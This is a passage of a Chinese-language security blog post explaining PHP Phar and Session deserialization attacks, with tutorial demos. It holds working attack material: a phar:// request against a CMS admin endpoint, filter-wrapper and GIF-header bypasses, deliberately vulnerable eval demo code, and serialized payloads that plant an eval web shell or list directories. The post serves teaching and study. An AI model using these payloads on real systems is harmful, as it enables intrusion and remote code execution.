</span>zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br><span class="hljs-attribute">Accept-Encoding</span><span class="hljs-punctuation">: </span>gzip, deflate, br<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/x-www-form-urlencoded; charset=UTF-8<br><span class="hljs-attribute">X-Requested-With</span><span class="hljs-punctuation">: </span>XMLHttpRequest<br><span class="hljs-attribute">Content-Length</span><span class="hljs-punctuation">: </span>120<br><span class="hljs-attribute">Origin</span><span class="hljs-punctuation">: </span>http://muyucms<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>keep-alive<br><span class="hljs-attribute">Referer</span><span class="hljs-punctuation">: </span>http://muyucms/admin.php/template/cutformadd.html<br><span class="hljs-attribute">Cookie</span><span class="hljs-punctuation">: </span>PHPSESSID=skuqikd25cc4rfvvja8hmpgdf7<br><span class="hljs-attribute">Priority</span><span class="hljs-punctuation">: </span>u=0<br><br><span class="language-llvm">finame<span class="hljs-operator">=</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%B5</span><span class="hljs-variable">%8</span>B<span class="hljs-variable">%E8</span><span class="hljs-variable">%AF</span><span class="hljs-variable">%95</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%BE</span><span class="hljs-variable">%97</span>&amp;fielname<span class="hljs-operator">=</span>gywm.html&amp;path<span class="hljs-operator">=</span>phar://./public/upload/images/<span class="hljs-number">67</span>a<span class="hljs-number">18015</span><span class="hljs-keyword">c</span><span class="hljs-number">2</span>a<span class="hljs-number">35</span>.jpg&amp;content<span class="hljs-operator">=</span><span class="hljs-number">66666</span></span><br></code></pre></td></tr></table></figure>

<h3 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h3><p>0X01、绕过__HALT_COMPILER检测的方法：</p>
<p>1、将Phar文件的内容写到压缩包注释中，压缩为zip文件，示例代码如下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs javascript">&lt;?php<br>$a = <span class="hljs-title function_">serialize</span>($a);<br>$zip = <span class="hljs-keyword">new</span> <span class="hljs-title class_">ZipArchive</span>();<br>$res = $zip-&gt;<span class="hljs-title function_">open</span>(<span class="hljs-string">&#x27;phar.zip&#x27;</span>,<span class="hljs-title class_">ZipArchive</span>::<span class="hljs-variable constant_">CREATE</span>); <br>$zip-&gt;<span class="hljs-title function_">addFromString</span>(<span class="hljs-string">&#x27;flag.txt&#x27;</span>, <span class="hljs-string">&#x27;flag is here&#x27;</span>);<br>$zip-&gt;<span class="hljs-title function_">setArchiveComment</span>($a);<br>$zip-&gt;<span class="hljs-title function_">close</span>();    <br>?&gt;<br></code></pre></td></tr></table></figure>

<p>2、将生成的Phar文件进行gzip压缩，压缩命令如下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">gzip test.phar<br></code></pre></td></tr></table></figure>

<p>0X02、当环境限制了phar不能出现在前面的字符里</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php">compress.bzip:<span class="hljs-comment">//phar:///test.phar/test.txt</span><br>compress.bzip2:<span class="hljs-comment">//phar:///test.phar/test.txt</span><br>compress.zlib:<span class="hljs-comment">//phar:///home/sx/test.phar/test.txt</span><br>php:<span class="hljs-comment">//filter/resource=phar:///test.phar/test.txt</span><br>php:<span class="hljs-comment">//filter/read=convert.base64-encode/resource=phar://phar.phar</span><br></code></pre></td></tr></table></figure>

<p>0X03、绕过文件格式（生成代码）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">TestObject</span> </span>&#123;<br>    &#125;<br><br>    @<span class="hljs-title function_ invoke__">unlink</span>(<span class="hljs-string">&quot;phar.phar&quot;</span>);<br>    <span class="hljs-variable">$phar</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Phar</span>(<span class="hljs-string">&quot;phar.phar&quot;</span>);<br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">startBuffering</span>();<br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setStub</span>(<span class="hljs-string">&quot;GIF89a&quot;</span>.<span class="hljs-string">&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;</span>); <span class="hljs-comment">//设置stub，增加gif文件头</span><br>    <span class="hljs-variable">$o</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">TestObject</span>();<br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">setMetadata</span>(<span class="hljs-variable">$o</span>); <span class="hljs-comment">//将自定义meta-data存入manifest</span><br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">addFromString</span>(<span class="hljs-string">&quot;test.txt&quot;</span>, <span class="hljs-string">&quot;test&quot;</span>); <span class="hljs-comment">//添加要压缩的文件</span><br>    <span class="hljs-comment">//签名自动计算</span><br>    <span class="hljs-variable">$phar</span>-&gt;<span class="hljs-title function_ invoke__">stopBuffering</span>();<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>总结下：</p>
<p>其实看了几篇关于phar反序列化的案例，几乎都是在TP框架有链子的基础上实现的，所以满足有全局性的利用链子+文件操作函数的cms+<code>./</code>无限制，可以考虑phar反序列化！如果能独自找到利用链的话，geigei菜菜教教！</p>
<hr>
<h2 id="Session反序列化"><a href="#Session反序列化" class="headerlink" title="Session反序列化"></a>Session反序列化</h2><h3 id="session序列化-反序列化"><a href="#session序列化-反序列化" class="headerlink" title="session序列化&amp;反序列化"></a>session序列化&amp;反序列化</h3><p><strong>Session的序列化（session存储）</strong></p>
<p>当用户通过PHP的$_SESSION变量存储数据时，PHP会自动将这些数据序列化（即转换成字符串）并存储在服务器端的Session文件或其他Session存储介质中。序列化的格式通常是可以通过serialize()函数手动生成的格式。</p>
<p><strong>Session的反序列化（session读取）</strong></p>
<p>当用户再次访问Session数据时，PHP会自动从服务器端读取Session文件，并通过unserialize()函数将数据转换回原始格式。这样，开发者可以像操作普通变量一样处理$_SESSION中的数据。</p>
<p>session序列化和反序列化的存在前提就是当代码中<strong>调用session_start()<strong>函数时，或者php.ini中的</strong>session.auto_start的值为1</strong>。session_start()被调用或者php.ini中的session.auto_start为1后，我们在与网页交互时**$_SESSION全局变量传递的参数**就会被用session的方式保存在一个默认目录中去</p>
<h3 id="简单利用1"><a href="#简单利用1" class="headerlink" title="简单利用1"></a>简单利用1</h3><h4 id="session配置参数"><a href="#session配置参数" class="headerlink" title="session配置参数"></a>session配置参数</h4><p><img src="https://s2.loli.net/2025/02/05/9n2GJaxqkDtVuBd.png" srcset="/img/loading.gif" lazyload alt="image-20250205104906508"></p>
<p>最需要我们关注的点就是存储和读取的处理器，这也是反序列化漏洞存在的的关键所在</p>
<h4 id="存储类别"><a href="#存储类别" class="headerlink" title="存储类别"></a>存储类别</h4><p>我就看一看比较常见的处理器、以及存储的格式</p>
<table>
<thead>
<tr>
<th>处理器</th>
<th>存储格式</th>
</tr>
</thead>
<tbody><tr>
<td>php</td>
<td>键名+竖线（分割线）+ serialize后的值：</td>
</tr>
<tr>
<td>php_serialize</td>
<td>serialize后这值：</td>
</tr>
<tr>
<td>php_binary</td>
<td>键名长度对应的ASCII字符+键名+serialize后的值：</td>
</tr>
</tbody></table>
<p>我们用下面这这段demo来看看存储的模样</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>,<span class="hljs-string">&#x27;php&#x27;</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;benben&#x27;</span>]=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;ben&#x27;</span>];<br><span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;b&#x27;</span>]=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;b&#x27;</span>];<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/02/05/zZDOhQ2bSG5v49J.png" srcset="/img/loading.gif" lazyload alt="image-20250205123720113"></p>
<p>然后去之前提到的存储路径查看找到对应的session保存文件。</p>
<p>php处理器</p>
<p><img src="https://s2.loli.net/2025/02/05/sQXkpVPnGcurbg8.png" srcset="/img/loading.gif" lazyload alt="image-20250205123604544"></p>
<p>php_serialize处理器（php&gt;5.5.4）</p>
<p><img src="https://s2.loli.net/2025/02/05/U87SIEGAmDaY9df.png" srcset="/img/loading.gif" lazyload alt="image-20250205123655993"></p>
<p>php_binary处理器，简单一下就行，不太重要</p>
<p><img src="https://s2.loli.net/2025/02/05/iTM8d6pL4nsbxQh.png" srcset="/img/loading.gif" lazyload alt="image-20250205124256308"></p>
<p>发现php处理器就是<strong>键名+竖线+序列化键值</strong>组成，读取时键值就会被执行反序列化操作，键名与键值的关键就在于竖线。</p>
<h4 id="漏洞原因"><a href="#漏洞原因" class="headerlink" title="漏洞原因"></a>漏洞原因</h4><p>在某个session的生命周期之内，两个文件对同一个session文件的写入与读取的格式的差异（如：一个文件使用php的方式存入，另一个文件以php_serialize的形式读取），一个文件用php_serialize处理器存储变量，另一个文件用php处理器读取session文件中的变量，当我构造存储的参数值出现以下形式时，<code>?ben=|序列化payload&amp;b=1</code></p>
<p><img src="https://s2.loli.net/2025/02/05/iBuXp9CxfrN4Tve.png" srcset="/img/loading.gif" lazyload alt="image-20250205130752716"></p>
<p>我们再看存储的形式</p>
<p><img src="https://s2.loli.net/2025/02/05/l6iy9Mw4pSd8UxF.png" srcset="/img/loading.gif" lazyload alt="image-20250205130819937"></p>
<p>此时由于竖线的存在，php处理器就可以处理它，并且被反序列化的键值还是完全可控的！！！然后再结合一些含危险函数的魔术方法不就行了吗！</p>
<h4 id="漏洞demo"><a href="#漏洞demo" class="headerlink" title="漏洞demo"></a>漏洞demo</h4><p>我们用一个存在session反序列化漏洞的demo来试一下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//session.php</span><br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>, <span class="hljs-string">&#x27;php_serialize&#x27;</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;ddd&#x27;</span>]=<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;ddd&#x27;</span>];<br><span class="hljs-meta">?&gt;</span><br><br>------------------------------------------------------------------------<br><span class="hljs-comment">//test.php</span><br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>,<span class="hljs-string">&quot;php&quot;</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ddd</span></span>&#123;<br>  <span class="hljs-keyword">var</span> <span class="hljs-variable">$a</span>;<br>  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>    <span class="hljs-variable">$fp</span> = <span class="hljs-title function_ invoke__">fopen</span>(<span class="hljs-string">&quot;D:\phpstudy_pro\WWW\\test\shell.php&quot;</span>, <span class="hljs-string">&quot;w&quot;</span>);<br>    <span class="hljs-title function_ invoke__">fputs</span>(<span class="hljs-variable">$fp</span>,<span class="hljs-variable">$this</span>-&gt;a);<br>    <span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$fp</span>);<br>  &#125;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br><br></code></pre></td></tr></table></figure>

<p>先构造payload：<code>ddd=|O:3:&quot;ddd&quot;:1:&#123;s:1:&quot;a&quot;;s:28:&quot;&lt;?php eval($_POST[&quot;abc&quot;]);?&gt;&quot;;&#125;</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ddd</span></span>&#123;<br>    <span class="hljs-keyword">var</span> <span class="hljs-variable">$a</span>=<span class="hljs-string">&#x27;&lt;?php eval($_POST[&quot;abc&quot;]);?&gt;&#x27;</span>;<br>&#125;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">ddd</span>());<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2025/02/05/QFXkpnrAIsVBaLb.png" srcset="/img/loading.gif" lazyload alt="image-20250205140811157"></p>
<p>接着直接访问test.php</p>
<p><img src="https://s2.loli.net/2025/02/05/5CVPmK2TaL1upk8.png" srcset="/img/loading.gif" lazyload alt="image-20250205141044945"></p>
<p>就能生成shell.php了</p>
<p><img src="https://s2.loli.net/2025/02/05/qNiM3cGISwHtgda.png" srcset="/img/loading.gif" lazyload alt="image-20250205141009406"></p>
<h3 id="session-upload-progress反序列化"><a href="#session-upload-progress反序列化" class="headerlink" title="session.upload_progress反序列化"></a>session.upload_progress反序列化</h3><h4 id="upload-progress机制介绍"><a href="#upload-progress机制介绍" class="headerlink" title="upload_progress机制介绍"></a>upload_progress机制介绍</h4><p>PHP 提供了 <code>session.upload_progress</code> 特性，用于<strong>跟踪大文件上传的进度</strong>。该功能默认开启，PHP 会在 <code>$_SESSION</code> 变量中存储文件上传的相关信息</p>
<h4 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h4><p>由于存在把文件相关的信息存储在session文件中，就可通过文件之间的存储读取差异（存储用php_serialize、读取用了php）来实现rce，类同于上述的反序列化差异，其中我们可控的就是我们的文件名。不过这个漏洞的要求更高，除了需要上面的简单利用的配置之外，要保证传入的值不被清除（php.ini中session.upload_progress.cleanup &#x3D; Off）</p>
<h4 id="漏洞demo-1"><a href="#漏洞demo-1" class="headerlink" title="漏洞demo"></a>漏洞demo</h4><p>upload.php中的action根据漏洞文件的路径而定</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">//upload.php上传代码</span><br>&lt;form action=<span class="hljs-string">&quot;http://test:8069/1.php&quot;</span> method=<span class="hljs-string">&quot;POST&quot;</span> enctype=<span class="hljs-string">&quot;multipart/form-data&quot;</span>&gt;<br>    &lt;input type=<span class="hljs-string">&quot;hidden&quot;</span> name=<span class="hljs-string">&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;</span> value=<span class="hljs-string">&quot;123&quot;</span> /&gt;<br>    &lt;input type=<span class="hljs-string">&quot;file&quot;</span> name=<span class="hljs-string">&quot;file&quot;</span> /&gt;<br>    &lt;input type=<span class="hljs-string">&quot;submit&quot;</span> /&gt;<br>&lt;/form&gt;<br><br><br>---------------------------------------------------<br><span class="hljs-comment">//1.php漏洞文件</span><br><br><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>,<span class="hljs-string">&#x27;php&#x27;</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test1</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ben</span>;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;ben = <span class="hljs-string">&#x27;phpinfo();&#x27;</span>;<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">eval</span>(<span class="hljs-variable language_">$this</span>-&gt;ben);<br>    &#125;<br><br>&#125;<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;ben&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$b</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test1</span>();<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-title function_ invoke__">highlight_string</span>(<span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;1.php&#x27;</span>));<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>构造<code>O:5:&quot;test1&quot;:1:&#123;s:3:&quot;ben&quot;;s:36:&quot;print_r(scandir(dirname(__FILE__)));&quot;;&#125;</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">ini_set</span>(<span class="hljs-string">&#x27;session.serialize_handler&#x27;</span>, <span class="hljs-string">&#x27;php_serialize&#x27;</span>);<br><span class="hljs-title function_ invoke__">session_start</span>();<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test1</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$ben</span>=<span class="hljs-string">&#x27;print_r(scandir(dirname(__FILE__)));&#x27;</span>;<br>&#125;<br><span class="hljs-variable">$b</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">test1</span>();<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$b</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>但是要防止双引号转义，同时在前面加上|，得到最终payload：<code>|O:5:\&quot;test1\&quot;:1:&#123;s:3:\&quot;ben\&quot;;s:36:\&quot;print_r(scandir(dirname(__FILE__)));\&quot;;&#125;</code></p>
<p>然后我们访问upload.php上传文件</p>
<p><img src="https://s2.loli.net/2025/02/05/1mHENQnbjr3tU4F.png" srcset="/img/loading.gif" lazyload alt="image-20250205221928649"></p>
<p><img src="https://s2.loli.net/2025/02/05/P3Sj5QiLCTYwpMx.png" srcset="/img/loading.gif" lazyload alt="image-20250205221344351"></p>
<p>即可实现session.upload_progress反序列化。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>一文领悟Phar、Session反序列化</div>
      <div>http://example.com/2025/02/05/一文领悟Phar、Session反序列化/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Yf3te</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年2月5日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/01/31/%E6%B5%85%E8%AF%86GraphQL%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/" title="浅识GraphQL安全问题">
                        <span class="hidden-mobile">浅识GraphQL安全问题</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"nPsiBpqAh9nfJ5Dy1WuaF7QX-MdYXbMMI","appKey":"uHgPDZvMgamWIL1SjZs4NpY4","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量
        <span id="leancloud-site-pv"></span>
        次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数
        <span id="leancloud-site-uv"></span>
        人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/Cherry.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script><!-- hexo injector body_end end --></body>
</html>
